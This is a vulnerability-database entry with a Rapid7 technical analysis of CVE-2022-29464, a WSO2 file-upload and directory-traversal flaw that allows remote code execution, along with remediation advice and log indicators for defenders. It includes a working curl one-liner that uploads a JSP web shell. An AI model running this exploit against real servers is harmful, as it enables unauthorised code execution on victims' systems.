Attacker Value
Very High
(2 users assessed)
Exploitability
Very High
(2 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
5

CVE-2022-29464

Disclosure Date: April 18, 2022
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Validated

Description

Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0.

Add Assessment

3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This is a very easy to exploit issue. See the Rapid7 analysis for details.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

The only downside of this vulnerability is that you don’t get command execution as root, you get execution in the context of the user running WSO2. Other than that, this is an attackers delight. It is is extremely trivial to exploit. Unpatched WSO2 API Managers should not be internet facing. There is a metasploit module as well as PoC details available. For more information see the Rapid7 Analysis.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • wso2

Products

  • api manager,
  • enterprise integrator,
  • identity server,
  • identity server analytics 5.4.0,
  • identity server analytics 5.4.1,
  • identity server analytics 5.5.0,
  • identity server analytics 5.6.0,
  • identity server as key manager,
  • open banking am,
  • open banking iam 2.0.0,
  • open banking km

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis

On April 18, 2022, MITRE published CVE-2022-29464 , an unrestricted file upload vulnerability affecting various WSO2 products. WSO2 followed with a security advisory explaining the vulnerability allowed unauthenticated and remote attackers to execute arbitrary code in the following products:

  • API Manager
  • Identity Server
  • Identity Server Analytics
  • Identity Server as Key Manager
  • Enterprise Integrator

A technical writeup and proof-of-concept exploit by @hakivvi quickly followed on April 20. The proof of concept uploads a malicious .jsp to /fileupload/toolsAny on the WSO2 product’s webserver. The .jsp is a web shell, and due to a directory traversal issue affecting the upload files name, the attacker can write it to a location where they can then send it commands. The attack is not restricted to .jsp files — other researchers, such as our old friend William Vu, have demonstrated exploitation with a war file.

Exploitation is quite easy. The following, modeled after both the original PoC and Vu’s, uploads a simple jsp web shell that the attacker will be able to use by visiting https://target:9443/authenticationendpoint/r7.jsp:

echo '<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"),null,null); %>' | curl -kv -F ../../../../repository/deployment/server/webapps/authenticationendpoint/r7.jsp=@- https://10.0.0.20:9443/fileupload/toolsAny

Rapid7’s Managed Detection and Response (MDR) team has observed this vulnerability being opportunistically exploited in the wild. Attackers appear to be staying close to the original proof-of-concept exploit and are dropping web shells and coin miners on exploited targets. Victim systems include both Windows and Linux installations of the aforementioned WSO2 products.

Rapid7 recommends remediating this vulnerability immediately per the instructions in WSO2’s advisory. If remediation is not possible, remove installations from the public internet as soon as possible. Inspect your installation for web shells (.jsp and .class): For example, the original proof of concept will drop the webshell in /authenticationendpoint/ which, when using API Manager on Windows, can be found in C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps\authenticationendpoint. Additionally, examine the server’s http_access log for requests to /fileupload/toolsAny as a possible indication of malicious behavior:

10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 200 31 - curl/7.74.0 0.016
10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000
10.0.0.2 - - [22/Apr/2022:15:49:13 -0400] POST /fileupload/toolsAny HTTP/1.1 200 32 - python-requests/2.25.1 0.000

Additionally, dropped war files will likely be exploded in the webapps directory (e.g. C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps). The deployment may create entries such as the following in the wso2carbon log:

TID: [-1234] [r7] [2022-04-22 15:51:32,609]  INFO {org.wso2.carbon.webapp.mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine[Catalina].StandardHost[localhost].StandardContext[/r7].File[C:\PROGRA~1\WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\r7.war]